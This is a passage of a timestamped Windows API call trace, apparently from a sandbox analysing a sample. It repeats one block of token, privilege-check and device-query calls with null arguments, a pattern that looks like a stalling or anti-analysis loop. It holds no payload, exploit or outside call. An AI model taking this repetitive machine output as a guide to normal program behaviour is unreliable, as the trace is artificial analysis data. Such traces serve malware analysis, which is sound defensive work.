0x3 [0085.179] GetLastError () returned 0x578 [0085.179] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.179] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.179] GetCurrentThread () returned 0xfffffffe [0085.179] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.179] GetLastError () returned 0x3f0 [0085.179] GetCurrentProcess () returned 0xffffffff [0085.179] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.179] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.179] SetLastError (dwErrCode=0x522) [0085.179] CloseHandle (hObject=0x114) returned 1 [0085.179] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.179] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.179] GetLastError () returned 0x578 [0085.179] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.179] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.179] GetCurrentThread () returned 0xfffffffe [0085.179] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.179] GetLastError () returned 0x3f0 [0085.179] GetCurrentProcess () returned 0xffffffff [0085.179] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.179] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.179] SetLastError (dwErrCode=0x522) [0085.179] CloseHandle (hObject=0x114) returned 1 [0085.179] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.179] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.179] GetLastError () returned 0x578 [0085.179] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.179] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.180] GetCurrentThread () returned 0xfffffffe [0085.180] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.180] GetLastError () returned 0x3f0 [0085.180] GetCurrentProcess () returned 0xffffffff [0085.180] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.180] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.180] SetLastError (dwErrCode=0x522) [0085.180] CloseHandle (hObject=0x114) returned 1 [0085.180] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.180] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.180] GetLastError () returned 0x578 [0085.180] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.180] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.180] GetCurrentThread () returned 0xfffffffe [0085.180] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.180] GetLastError () returned 0x3f0 [0085.180] GetCurrentProcess () returned 0xffffffff [0085.180] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.180] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.180] SetLastError (dwErrCode=0x522) [0085.180] CloseHandle (hObject=0x114) returned 1 [0085.180] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.180] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.180] GetLastError () returned 0x578 [0085.180] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.180] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.180] GetCurrentThread () returned 0xfffffffe [0085.180] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.180] GetLastError () returned 0x3f0 [0085.180] GetCurrentProcess () returned 0xffffffff [0085.180] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.180] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.180] SetLastError (dwErrCode=0x522) [0085.180] CloseHandle (hObject=0x114) returned 1 [0085.180] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.180] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.180] GetLastError () returned 0x578 [0085.180] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.181] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.181] GetCurrentThread () returned 0xfffffffe [0085.181] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.181] GetLastError () returned 0x3f0 [0085.181] GetCurrentProcess () returned 0xffffffff [0085.181] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.181] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.181] SetLastError (dwErrCode=0x522) [0085.181] CloseHandle (hObject=0x114) returned 1 [0085.181] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.181] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.181] GetLastError () returned 0x578 [0085.181] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.181] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.181] GetCurrentThread () returned 0xfffffffe [0085.181] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.181] GetLastError () returned 0x3f0 [0085.181] GetCurrentProcess () returned 0xffffffff [0085.181] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.181] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.181] SetLastError (dwErrCode=0x522) [0085.181] CloseHandle (hObject=0x114) returned 1 [0085.181] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.181] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.181] GetLastError () returned 0x578 [0085.181] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.181] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.181] GetCurrentThread () returned 0xfffffffe [0085.181] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.181] GetLastError () returned 0x3f0 [0085.181] GetCurrentProcess () returned 0xffffffff [0085.181] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.181] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.181] SetLastError (dwErrCode=0x522) [0085.181] CloseHandle (hObject=0x114) returned 1 [0085.181] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.181] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.181] GetLastError () returned 0x578 [0085.181] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.182] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.182] GetCurrentThread () returned 0xfffffffe [0085.182] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.182] GetLastError () returned 0x3f0 [0085.182] GetCurrentProcess () returned 0xffffffff [0085.182] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.182] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.182] SetLastError (dwErrCode=0x522) [0085.182] CloseHandle (hObject=0x114) returned 1 [0085.182] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.182] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.182] GetLastError () returned 0x578 [0085.182] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.182] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.182] GetCurrentThread () returned 0xfffffffe [0085.182] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.182] GetLastError () returned 0x3f0 [0085.182] GetCurrentProcess () returned 0xffffffff [0085.182] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.182] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.182] SetLastError (dwErrCode=0x522) [0085.182] CloseHandle (hObject=0x114) returned 1 [0085.182] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.182] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.182] GetLastError () returned 0x578 [0085.182] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.182] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.182] GetCurrentThread () returned 0xfffffffe [0085.182] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.182] GetLastError () returned 0x3f0 [0085.182] GetCurrentProcess () returned 0xffffffff [0085.182] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.182] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.182] SetLastError (dwErrCode=0x522) [0085.182] CloseHandle (hObject=0x114) returned 1 [0085.182] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.182] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.182] GetLastError () returned 0x578 [0085.183] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.183] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.183] GetCurrentThread () returned 0xfffffffe [0085.183] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.183] GetLastError () returned 0x3f0 [0085.183] GetCurrentProcess () returned 0xffffffff [0085.183] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.183] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.183] SetLastError (dwErrCode=0x522) [0085.183] CloseHandle (hObject=0x114) returned 1 [0085.183] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.183] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.183] GetLastError () returned 0x578 [0085.183] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.183] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.183] GetCurrentThread () returned 0xfffffffe [0085.183] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.183] GetLastError () returned 0x3f0 [0085.183] GetCurrentProcess () returned 0xffffffff [0085.183] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.183] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.183] SetLastError (dwErrCode=0x522) [0085.183] CloseHandle (hObject=0x114) returned 1 [0085.183] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.183] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.183] GetLastError () returned 0x578 [0085.183] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.183] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.183] GetCurrentThread () returned 0xfffffffe [0085.183] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.183] GetLastError () returned 0x3f0 [0085.183] GetCurrentProcess () returned 0xffffffff [0085.183] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.183] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.183] SetLastError (dwErrCode=0x522) [0085.183] CloseHandle (hObject=0x114) returned 1 [0085.184] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.184] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.184] GetLastError () returned 0x578 [0085.184] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.184] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.184] GetCurrentThread () returned 0xfffffffe [0085.184] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.184] GetLastError () returned 0x3f0 [0085.184] GetCurrentProcess () returned 0xffffffff [0085.184] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.184] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.184] SetLastError (dwErrCode=0x522) [0085.184] CloseHandle (hObject=0x114) returned 1 [0085.184] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.184] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.184] GetLastError () returned 0x578 [0085.184] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.184] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.184] GetCurrentThread () returned 0xfffffffe [0085.184] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.184] GetLastError () returned 0x3f0 [0085.184] GetCurrentProcess () returned 0xffffffff [0085.184] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.184] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.184] SetLastError (dwErrCode=0x522) [0085.184] CloseHandle (hObject=0x114) returned 1 [0085.184] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.184] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.184] GetLastError () returned 0x578 [0085.184] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.184] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.184] GetCurrentThread () returned 0xfffffffe [0085.184] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.184] GetLastError () returned 0x3f0 [0085.184] GetCurrentProcess () returned 0xffffffff [0085.184] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.184] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.184] SetLastError (dwErrCode=0x522) [0085.185] CloseHandle (hObject=0x114) returned 1 [0085.185] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.185] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.185] GetLastError () returned 0x578 [0085.185] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.185] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.185] GetCurrentThread () returned 0xfffffffe [0085.185] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.185] GetLastError () returned 0x3f0 [0085.185] GetCurrentProcess () returned 0xffffffff [0085.185] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.185] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.185] SetLastError (dwErrCode=0x522) [0085.185] CloseHandle (hObject=0x114) returned 1 [0085.185] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.185] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.185] GetLastError () returned 0x578 [0085.185] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.185] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.185] GetCurrentThread () returned 0xfffffffe [0085.185] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.185] GetLastError () returned 0x3f0 [0085.185] GetCurrentProcess () returned 0xffffffff [0085.185] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.185] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.185] SetLastError (dwErrCode=0x522) [0085.185] CloseHandle (hObject=0x114) returned 1 [0085.185] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.185] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.185] GetLastError () returned 0x578 [0085.185] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.185] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.185] GetCurrentThread () returned 0xfffffffe [0085.185] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.185] GetLastError () returned 0x3f0 [0085.185] GetCurrentProcess () returned 0xffffffff [0085.185] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.185] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.186] SetLastError (dwErrCode=0x522) [0085.186] CloseHandle (hObject=0x114) returned 1 [0085.186] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.186] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.186] GetLastError () returned 0x578 [0085.186] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.186] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.186] GetCurrentThread () returned 0xfffffffe [0085.186] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.186] GetLastError () returned 0x3f0 [0085.186] GetCurrentProcess () returned 0xffffffff [0085.186] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.186] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.186] SetLastError (dwErrCode=0x522) [0085.186] CloseHandle (hObject=0x114) returned 1 [0085.186] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.186] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.186] GetLastError () returned 0x578 [0085.186] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.186] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.186] GetCurrentThread () returned 0xfffffffe [0085.186] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.186] GetLastError () returned 0x3f0 [0085.186] GetCurrentProcess () returned 0xffffffff [0085.186] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.186] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.186] SetLastError (dwErrCode=0x522) [0085.186] CloseHandle (hObject=0x114) returned 1 [0085.186] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.186] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, 